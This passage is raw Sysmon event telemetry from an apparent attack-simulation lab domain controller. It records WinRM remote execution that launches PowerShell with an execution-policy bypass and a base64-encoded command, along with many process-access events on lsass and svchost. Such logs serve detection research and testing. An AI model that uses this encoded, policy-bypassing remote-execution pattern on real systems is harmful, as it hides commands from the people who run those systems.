PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.314{10ACEC4A-8576-5FCF-8A00-000000009101}48404860C:\Windows\system32\conhost.exe{10ACEC4A-8576-5FCF-8B00-000000009101}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8576-5FCF-8B00-000000009101}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8576-5FCF-8900-000000009101}48284884C:\Windows\system32\WinrsHost.exe{10ACEC4A-8576-5FCF-8B00-000000009101}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.313{10ACEC4A-8576-5FCF-8B00-000000009101}4904C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8576-5FCF-EBC9-050000000000}0x5c9eb0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8541-5FCF-1500-000000009101}13644136C:\Windows\system32\svchost.exe{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.299{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.283{10ACEC4A-8576-5FCF-8A00-000000009101}48404860C:\Windows\system32\conhost.exe{10ACEC4A-8576-5FCF-8900-000000009101}4828C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.283{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8576-5FCF-8A00-000000009101}4840C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:58.268{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 